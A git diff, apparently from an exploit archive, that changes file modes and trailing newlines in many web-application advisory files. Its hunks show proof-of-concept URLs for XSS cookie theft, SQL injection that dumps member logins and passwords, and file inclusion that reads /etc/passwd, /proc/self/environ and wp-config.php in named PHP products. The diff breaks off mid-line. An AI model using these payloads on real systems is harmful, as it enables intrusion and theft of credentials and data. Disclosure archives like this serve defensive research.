http://www.example.com/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&pos http://www.example.com/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview -http://www.example.com/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview \ No newline at end of file +http://www.example.com/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview \ No newline at end of file diff --git a/platforms/php/webapps/35291.txt b/platforms/php/webapps/35291.txt old mode 100755 new mode 100644 index f36742f24..8fe7941a2 --- a/platforms/php/webapps/35291.txt +++ b/platforms/php/webapps/35291.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Vanilla Forums 2.0.16 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?p=/entry/signin&Target=javascript:alert(document.cookie)//http:// \ No newline at end of file +http://www.example.com/index.php?p=/entry/signin&Target=javascript:alert(document.cookie)//http:// \ No newline at end of file diff --git a/platforms/php/webapps/35292.html b/platforms/php/webapps/35292.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35293.txt b/platforms/php/webapps/35293.txt old mode 100755 new mode 100644 index 49819e9bc..51728ba73 --- a/platforms/php/webapps/35293.txt +++ b/platforms/php/webapps/35293.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc VirtueMart eCommerce 1.1.6 is vulnerable; other versions may also be affected. http://www.example.com/index.php?category_id=&page=shop.browse&option=com_virtuemart&Itemid=1&keyword1=hand&search_op=and&keyword2=&search_limiter=anywhere&search=Search&search_category=3 -AND $BLIND_SQL -- \ No newline at end of file +AND $BLIND_SQL -- \ No newline at end of file diff --git a/platforms/php/webapps/35294.txt b/platforms/php/webapps/35294.txt old mode 100755 new mode 100644 index cf86d7e92..e72db54db --- a/platforms/php/webapps/35294.txt +++ b/platforms/php/webapps/35294.txt @@ -4,4 +4,4 @@ The 'com_clan_members' component for Joomla! is prone to an SQL-injection vulner Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_clan_members&id=[EXPLOIT] \ No newline at end of file +http://www.example.com/index.php?option=com_clan_members&id=[EXPLOIT] \ No newline at end of file diff --git a/platforms/php/webapps/35295.txt b/platforms/php/webapps/35295.txt old mode 100755 new mode 100644 index 7625cca8e..eff80f9d7 --- a/platforms/php/webapps/35295.txt +++ b/platforms/php/webapps/35295.txt @@ -4,4 +4,4 @@ The 'com_frontenduseraccess' component for Joomla! is prone to a local file-incl An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. -http://www.example.com/index.php?option=com_frontenduseraccess&controller=../../../../../../../../../../proc/self/environ%00 \ No newline at end of file +http://www.example.com/index.php?option=com_frontenduseraccess&controller=../../../../../../../../../../proc/self/environ%00 \ No newline at end of file diff --git a/platforms/php/webapps/35296.txt b/platforms/php/webapps/35296.txt old mode 100755 new mode 100644 index 4a1ae0f12..3e1a6dcef --- a/platforms/php/webapps/35296.txt +++ b/platforms/php/webapps/35296.txt @@ -8,4 +8,4 @@ eSyndiCat Directory Software versions 2.2 and 2.3 are vulnerable; other versions http://www.example.com/?preview="><script>alert('XSS')</script> -http://www.example.com/?preview="><meta http-equiv="Refresh" content="0;url=http://www.example2.com/"> "" \ No newline at end of file +http://www.example.com/?preview="><meta http-equiv="Refresh" content="0;url=http://www.example2.com/"> "" \ No newline at end of file diff --git a/platforms/php/webapps/35297.txt b/platforms/php/webapps/35297.txt old mode 100755 new mode 100644 index 4a2c4763c..edd2a3678 --- a/platforms/php/webapps/35297.txt +++ b/platforms/php/webapps/35297.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability may allow an attacker to perform cross-site script Versions prior to Moodle 2.0.1 are vulnerable. -http://www.example.com/moodle/lib/spikephpcoverage/src/phpcoverage.remote.top.inc.php?PHPCOVERAGE_HOME=[xss] \ No newline at end of file +http://www.example.com/moodle/lib/spikephpcoverage/src/phpcoverage.remote.top.inc.php?PHPCOVERAGE_HOME=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35298.txt b/platforms/php/webapps/35298.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35300.txt b/platforms/php/webapps/35300.txt old mode 100755 new mode 100644 index 795116f1a..11ae8339c --- a/platforms/php/webapps/35300.txt +++ b/platforms/php/webapps/35300.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow TagNinja 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/tagninja/fb_get_profile.php?id=[xss] \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/tagninja/fb_get_profile.php?id=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35301.html b/platforms/php/webapps/35301.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35303.txt b/platforms/php/webapps/35303.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35305.txt b/platforms/php/webapps/35305.txt old mode 100755 new mode 100644 index 59fa74a10..b0f3b68ef --- a/platforms/php/webapps/35305.txt +++ b/platforms/php/webapps/35305.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce ACollab 1.2 is vulnerable; other versions may also be affected. -http://www.example.com/acollab/admin/lang.php?lang=&t=xxx'UNION%20SELECT%200,0,'error',GROUP_CONCAT(login,':',password),4%20FROM%20AC_members%20WHERE%20'a'='a \ No newline at end of file +http://www.example.com/acollab/admin/lang.php?lang=&t=xxx'UNION%20SELECT%200,0,'error',GROUP_CONCAT(login,':',password),4%20FROM%20AC_members%20WHERE%20'a'='a \ No newline at end of file diff --git a/platforms/php/webapps/35306.txt b/platforms/php/webapps/35306.txt old mode 100755 new mode 100644 index 2c0e42c2f..651e05da2 --- a/platforms/php/webapps/35306.txt +++ b/platforms/php/webapps/35306.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow TCExam 11.1.016 is vulnerable; other versions may also be affected. -http://www.example.com/tcexam/public/code/tce_user_registration.php?user_password=testab%22%3E%3Cscript%3Ealert(0)%3C/script%3E%3Cinput%20type=%22hidden \ No newline at end of file +http://www.example.com/tcexam/public/code/tce_user_registration.php?user_password=testab%22%3E%3Cscript%3Ealert(0)%3C/script%3E%3Cinput%20type=%22hidden \ No newline at end of file diff --git a/platforms/php/webapps/35309.txt b/platforms/php/webapps/35309.txt old mode 100755 new mode 100644 index 6c17228e0..e3ee78361 --- a/platforms/php/webapps/35309.txt +++ b/platforms/php/webapps/35309.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor Betsy 4.0 is vulnerable; other versions may also be affected. -http://www.example.com/ress.php?page=[LFI] \ No newline at end of file +http://www.example.com/ress.php?page=[LFI] \ No newline at end of file diff --git a/platforms/php/webapps/35311.txt b/platforms/php/webapps/35311.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35312.txt b/platforms/php/webapps/35312.txt old mode 100755 new mode 100644 index 9830ae78c..9bbb077b2 --- a/platforms/php/webapps/35312.txt +++ b/platforms/php/webapps/35312.txt @@ -4,4 +4,4 @@ Firebook is prone to a cross-site scripting vulnerability because it fails to su Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials. -http://www.example.com/env/index.html?[xss] \ No newline at end of file +http://www.example.com/env/index.html?[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35313.txt b/platforms/php/webapps/35313.txt old mode 100755 new mode 100644 index adf8ae69b..1b79e7e6d --- a/platforms/php/webapps/35313.txt +++ b/platforms/php/webapps/35313.txt @@ -135,4 +135,4 @@ Vulnerable code: (Line: 368 -> 372) global $wpdb, $current_user; $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_REQUEST['id'] . " "); $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu WHERE pid = " . $_REQUEST['id'] . " "); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/php/webapps/35315.txt b/platforms/php/webapps/35315.txt old mode 100755 new mode 100644 index b9bb49126..6b7880ccb --- a/platforms/php/webapps/35315.txt +++ b/platforms/php/webapps/35315.txt @@ -7,4 +7,4 @@ A successful exploit could allow an attacker to compromise the application, acce Escortservice 1.0 is vulnerable; other versions may also be affected. http://www.example.com/show_profile.php?custid=1+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+ \ No newline at end of file +,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+ \ No newline at end of file diff --git a/platforms/php/webapps/35319.txt b/platforms/php/webapps/35319.txt old mode 100755 new mode 100644 index 8071509bf..a68a6f7d1 --- a/platforms/php/webapps/35319.txt +++ b/platforms/php/webapps/35319.txt @@ -7,4 +7,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in http://www.example.com/html/scripts/index.php?>[xss] -http://www.example.com/SC/html/scripts/index.php?did=22&login=1">[xss]&first_name=2"><script>alert(document.cookie)</script>&custgroupID=0&email=&last_name=&ActState=-1&search=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&charset=cp1251&count_to_export= \ No newline at end of file +http://www.example.com/SC/html/scripts/index.php?did=22&login=1">[xss]&first_name=2"><script>alert(document.cookie)</script>&custgroupID=0&email=&last_name=&ActState=-1&search=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&charset=cp1251&count_to_export= \ No newline at end of file diff --git a/platforms/php/webapps/3532.txt b/platforms/php/webapps/3532.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35320.txt b/platforms/php/webapps/35320.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35323.md b/platforms/php/webapps/35323.md old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35324.txt b/platforms/php/webapps/35324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35327.txt b/platforms/php/webapps/35327.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35328.txt b/platforms/php/webapps/35328.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35329.txt b/platforms/php/webapps/35329.txt old mode 100755 new mode 100644 index 54c51ed92..b914873d1 --- a/platforms/php/webapps/35329.txt +++ b/platforms/php/webapps/35329.txt @@ -6,4 +6,4 @@ Exploiting these issues will allow an attacker to execute arbitrary script code Versions prior to PHPXref 0.7 are vulnerable; other versions may also be affected. -http://www.example.com/nav.html?javascript:alert(document.cookie) \ No newline at end of file +http://www.example.com/nav.html?javascript:alert(document.cookie) \ No newline at end of file diff --git a/platforms/php/webapps/3533.txt b/platforms/php/webapps/3533.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35330.txt b/platforms/php/webapps/35330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35331.txt b/platforms/php/webapps/35331.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35332.txt b/platforms/php/webapps/35332.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35334.txt b/platforms/php/webapps/35334.txt old mode 100755 new mode 100644 index 344703f05..7fbb1c8e7 --- a/platforms/php/webapps/35334.txt +++ b/platforms/php/webapps/35334.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce RunCMS 2.2.2 is vulnerable; other versions may also be affected. -http://www.example.com/register.php?uname=user3&email=user%40test2.com&user_viewemail=0&name=user3&address=nope&zip_code=123&town=nope&user_from=nope&phone=123&user_avatar=blank.gif&timezone_offset=123'SQL_CODE_HERE&url=http%3A%2F%2Fnope&language=english&passw=password&vpassw=password&user_mailok=1&verify_text=&verify_crc=&keystring=368483&op=finish \ No newline at end of file +http://www.example.com/register.php?uname=user3&email=user%40test2.com&user_viewemail=0&name=user3&address=nope&zip_code=123&town=nope&user_from=nope&phone=123&user_avatar=blank.gif&timezone_offset=123'SQL_CODE_HERE&url=http%3A%2F%2Fnope&language=english&passw=password&vpassw=password&user_mailok=1&verify_text=&verify_crc=&keystring=368483&op=finish \ No newline at end of file diff --git a/platforms/php/webapps/35335.html b/platforms/php/webapps/35335.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35336.txt b/platforms/php/webapps/35336.txt old mode 100755 new mode 100644 index e7822b08e..83b3dd1a5 --- a/platforms/php/webapps/35336.txt +++ b/platforms/php/webapps/35336.txt @@ -28,4 +28,4 @@ TaskFreak! 0.6.4 is vulnerable; other versions may also be affected. <a href="javascript: xss();" style="text-decoration:none"> -<b><font color="red"><center><h3>Exploit!<h3></center></font></b></a> \ No newline at end of file +<b><font color="red"><center><h3>Exploit!<h3></center></font></b></a> \ No newline at end of file diff --git a/platforms/php/webapps/35337.txt b/platforms/php/webapps/35337.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35338.txt b/platforms/php/webapps/35338.txt old mode 100755 new mode 100644 index 3c67a2e41..3ac368f33 --- a/platforms/php/webapps/35338.txt +++ b/platforms/php/webapps/35338.txt @@ -18,4 +18,4 @@ Connection: Keep-alive Accept-Encoding: gzip,deflate -Accept: */* \ No newline at end of file +Accept: */* \ No newline at end of file diff --git a/platforms/php/webapps/35340.txt b/platforms/php/webapps/35340.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35343.txt b/platforms/php/webapps/35343.txt old mode 100755 new mode 100644 index 0af6c905b..f3c214abb --- a/platforms/php/webapps/35343.txt +++ b/platforms/php/webapps/35343.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to inject and execute arbitrary PHP code in t Versions prior to Smarty Template Engine 3.0.7 are vulnerable. -$smarty.template : '.(include 'hack.php').'.tpl \ No newline at end of file +$smarty.template : '.(include 'hack.php').'.tpl \ No newline at end of file diff --git a/platforms/php/webapps/35344.txt b/platforms/php/webapps/35344.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35346.txt b/platforms/php/webapps/35346.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35347.txt b/platforms/php/webapps/35347.txt old mode 100755 new mode 100644 index bd8a1a6a8..4d2a4300a --- a/platforms/php/webapps/35347.txt +++ b/platforms/php/webapps/35347.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Dokeos 1.8.6.2 is vulnerable; other versions may also be affected. -http://www.example.com/dokeos/main/inc/latex.php?code=%22style=%22top:0;position:absolute;width:9999px;height:9999px;%22onmouseover%3d%22alert(0) \ No newline at end of file +http://www.example.com/dokeos/main/inc/latex.php?code=%22style=%22top:0;position:absolute;width:9999px;height:9999px;%22onmouseover%3d%22alert(0) \ No newline at end of file diff --git a/platforms/php/webapps/35348.txt b/platforms/php/webapps/35348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35349.txt b/platforms/php/webapps/35349.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35350.txt b/platforms/php/webapps/35350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35351.txt b/platforms/php/webapps/35351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35353.txt b/platforms/php/webapps/35353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35360.txt b/platforms/php/webapps/35360.txt old mode 100755 new mode 100644 index c30ce0aee..819260518 --- a/platforms/php/webapps/35360.txt +++ b/platforms/php/webapps/35360.txt @@ -8,4 +8,4 @@ WSN Guest 1.24 is vulnerable; other versions may also be vulnerable. GET /wsnguest/index.php?debug=1 HTTP/1.0 Host: www.example.com -Cookie: wsnuser=[SQL Injection] \ No newline at end of file +Cookie: wsnuser=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/35362.txt b/platforms/php/webapps/35362.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35367.txt b/platforms/php/webapps/35367.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35371.txt b/platforms/php/webapps/35371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35373.txt b/platforms/php/webapps/35373.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35374.txt b/platforms/php/webapps/35374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35375.txt b/platforms/php/webapps/35375.txt old mode 100755 new mode 100644 index f38f5fc24..6070d2231 --- a/platforms/php/webapps/35375.txt +++ b/platforms/php/webapps/35375.txt @@ -4,4 +4,4 @@ Vanilla Forums is prone to a cross-site scripting vulnerability because it fails An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/vanilla/index.php?p=[xss] \ No newline at end of file +http://www.example.com/vanilla/index.php?p=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35376.txt b/platforms/php/webapps/35376.txt old mode 100755 new mode 100644 index 5afe87b02..dcf06d7ab --- a/platforms/php/webapps/35376.txt +++ b/platforms/php/webapps/35376.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor mySeatXT 0.164 is vulnerable; other versions may also be affected. -http://www.example.com/myseatxt/contactform/cancel.php?lang=../../../../../../../../windows/system.ini%00 \ No newline at end of file +http://www.example.com/myseatxt/contactform/cancel.php?lang=../../../../../../../../windows/system.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/35378.txt b/platforms/php/webapps/35378.txt old mode 100755 new mode 100644 index 777a4522c..b9832c342 --- a/platforms/php/webapps/35378.txt +++ b/platforms/php/webapps/35378.txt @@ -26,4 +26,4 @@ |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| -|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| \ No newline at end of file +|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| \ No newline at end of file diff --git a/platforms/php/webapps/3538.txt b/platforms/php/webapps/3538.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35381.txt b/platforms/php/webapps/35381.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35387.txt b/platforms/php/webapps/35387.txt old mode 100755 new mode 100644 index 4bb9c0310..67d07d936 --- a/platforms/php/webapps/35387.txt +++ b/platforms/php/webapps/35387.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary HTML and script code in phpShop versions 0.8.1 and prior are vulnerable. -http://www.example.com/phpshop0_8_1/?page=store/XSS&%26%26%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3d1 \ No newline at end of file +http://www.example.com/phpshop0_8_1/?page=store/XSS&%26%26%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3d1 \ No newline at end of file diff --git a/platforms/php/webapps/3539.txt b/platforms/php/webapps/3539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35391.txt b/platforms/php/webapps/35391.txt old mode 100755 new mode 100644 index bbf9e06c4..c48256c1f --- a/platforms/php/webapps/35391.txt +++ b/platforms/php/webapps/35391.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The vendor refutes this issue stating it can not be exploited as described. http://www.example.com/user.php?mode=1 and substring(version(),1,1)=4 -http://www.example.com/user.php?mode=1 and substring(version(),1,1)=5 \ No newline at end of file +http://www.example.com/user.php?mode=1 and substring(version(),1,1)=5 \ No newline at end of file diff --git a/platforms/php/webapps/35392.txt b/platforms/php/webapps/35392.txt old mode 100755 new mode 100644 index 4177895cd..7ae6c7c26 --- a/platforms/php/webapps/35392.txt +++ b/platforms/php/webapps/35392.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow IGIT Posts Slider Widget plugin 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/igit-posts-slider-widget/timthumb.php?src=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/igit-posts-slider-widget/timthumb.php?src=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35393.txt b/platforms/php/webapps/35393.txt old mode 100755 new mode 100644 index 7f211d72b..d0991bee7 --- a/platforms/php/webapps/35393.txt +++ b/platforms/php/webapps/35393.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ComicPress Manager 1.4.9.2 and 1.4.9.9 are vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/comicpress-manager/jscalendar-1.0/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C%2fscript%3E&submitted= \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/comicpress-manager/jscalendar-1.0/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C%2fscript%3E&submitted= \ No newline at end of file diff --git a/platforms/php/webapps/35394.txt b/platforms/php/webapps/35394.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35396.txt b/platforms/php/webapps/35396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35397.txt b/platforms/php/webapps/35397.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35400.txt b/platforms/php/webapps/35400.txt old mode 100755 new mode 100644 index 2a3c5b0bc..ea39e7a6e --- a/platforms/php/webapps/35400.txt +++ b/platforms/php/webapps/35400.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to retrieve the contents of an arbitrary file http://www.example.com/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1 -http://www.example.com/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd \ No newline at end of file +http://www.example.com/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/35401.txt b/platforms/php/webapps/35401.txt old mode 100755 new mode 100644 index 7d8a503b1..038262af6 --- a/platforms/php/webapps/35401.txt +++ b/platforms/php/webapps/35401.txt @@ -4,4 +4,4 @@ SnapProof is prone to a cross-site-scripting vulnerability because it fails to p An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/cart.php?retPageID=[XSS] \ No newline at end of file +http://www.example.com/cart.php?retPageID=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/35402.txt b/platforms/php/webapps/35402.txt old mode 100755 new mode 100644 index a51af3fec..483702e2d --- a/platforms/php/webapps/35402.txt +++ b/platforms/php/webapps/35402.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a http://www.example.com/grein.php?id=[sqli] http://www.example.com/rit.php?id=[sqli] http://www.example.com/index.php?id=[sqli] -http://www.example.com/sida.php?id=[SQLi] \ No newline at end of file +http://www.example.com/sida.php?id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35405.txt b/platforms/php/webapps/35405.txt old mode 100755 new mode 100644 index 05702ecbf..6dd3fac5c --- a/platforms/php/webapps/35405.txt +++ b/platforms/php/webapps/35405.txt @@ -4,4 +4,4 @@ VidiScript is prone to a cross-site scripting vulnerability because it fails to An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/index.php?vp=[XSS] \ No newline at end of file +http://www.example.com/index.php?vp=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/35406.txt b/platforms/php/webapps/35406.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35407.txt b/platforms/php/webapps/35407.txt old mode 100755 new mode 100644 index fe98cac30..b5ef585bf --- a/platforms/php/webapps/35407.txt +++ b/platforms/php/webapps/35407.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow phpWebSite 1.7.1 is vulnerable; other versions may also be affected. -http://www.example.com/phpwebsite_1_7_1/javascript/editors/fckeditor/editor/custom.php?local=%3Cscript%3Ealert(0)%3C%2fscript%3E http://www.example.com/phpwebsite_1_7_1/javascript/editors/fckeditor/editor/custom.php?local=%3Cscript%3Ealert(0)%3C%2fscript%3E \ No newline at end of file +http://www.example.com/phpwebsite_1_7_1/javascript/editors/fckeditor/editor/custom.php?local=%3Cscript%3Ealert(0)%3C%2fscript%3E http://www.example.com/phpwebsite_1_7_1/javascript/editors/fckeditor/editor/custom.php?local=%3Cscript%3Ealert(0)%3C%2fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/35408.txt b/platforms/php/webapps/35408.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35409.txt b/platforms/php/webapps/35409.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35416.txt b/platforms/php/webapps/35416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35417.php b/platforms/php/webapps/35417.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35418.txt b/platforms/php/webapps/35418.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3542.txt b/platforms/php/webapps/3542.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35428.txt b/platforms/php/webapps/35428.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35429.txt b/platforms/php/webapps/35429.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35430.txt b/platforms/php/webapps/35430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35431.txt b/platforms/php/webapps/35431.txt old mode 100755 new mode 100644 index 7295ce053..6658b44f4 --- a/platforms/php/webapps/35431.txt +++ b/platforms/php/webapps/35431.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow RuubikCMS 1.0.3 is vulnerable; other versions may also be affected. -http://www.example.com/ruubikcms/cms/includes/head.php?cmspage=</title><script>alert(123);</script> \ No newline at end of file +http://www.example.com/ruubikcms/cms/includes/head.php?cmspage=</title><script>alert(123);</script> \ No newline at end of file diff --git a/platforms/php/webapps/35435.txt b/platforms/php/webapps/35435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35436.txt b/platforms/php/webapps/35436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35439.txt b/platforms/php/webapps/35439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35443.txt b/platforms/php/webapps/35443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35444.txt b/platforms/php/webapps/35444.txt old mode 100755 new mode 100644 index 25750f24c..ab3eef416 --- a/platforms/php/webapps/35444.txt +++ b/platforms/php/webapps/35444.txt @@ -11,4 +11,4 @@ Exploiting these issues could allow an attacker to execute arbitrary code, hijac http://www.example.com/lms/sistema/webensino/index.php?modo=resbusca_biblioteca&pChave=a%22%2F%3E+%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&Submit=Buscar -http://www.example.com/lms/sistema/webensino/index.php?modo=itensCategoriaBiblioteca&codBibliotecaCategoria=<SQLi> \ No newline at end of file +http://www.example.com/lms/sistema/webensino/index.php?modo=itensCategoriaBiblioteca&codBibliotecaCategoria=<SQLi> \ No newline at end of file diff --git a/platforms/php/webapps/35447.txt b/platforms/php/webapps/35447.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3545.txt b/platforms/php/webapps/3545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35451.txt b/platforms/php/webapps/35451.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35452.txt b/platforms/php/webapps/35452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35453.txt b/platforms/php/webapps/35453.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35454.txt b/platforms/php/webapps/35454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35455.txt b/platforms/php/webapps/35455.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35456.txt b/platforms/php/webapps/35456.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35457.txt b/platforms/php/webapps/35457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35459.txt b/platforms/php/webapps/35459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35460.txt b/platforms/php/webapps/35460.txt old mode 100755 new mode 100644 index 353544b52..261151883 --- a/platforms/php/webapps/35460.txt +++ b/platforms/php/webapps/35460.txt @@ -33,6 +33,4 @@ Datos. POF: localhost/wordpress/wp-content/plugins/google-mp3-audio-player/direct_downlo -ad.php?file=../../../wp-config.php - - \ No newline at end of file +ad.php?file=../../../wp-config.php \ No newline at end of file diff --git a/platforms/php/webapps/35467.txt b/platforms/php/webapps/35467.txt old mode 100755 new mode 100644 index 39f033ff0..613c0f9f7 --- a/platforms/php/webapps/35467.txt +++ b/platforms/php/webapps/35467.txt @@ -7,4 +7,4 @@ Attackers can exploit this issue to obtain sensitive information that may lead t http://www.example.org/sugarcrm/index.php?module=Accounts&action=ShowDuplicates -http://www.example.org/sugarcrm/index.php?module=Contacts&action=ShowDuplicates \ No newline 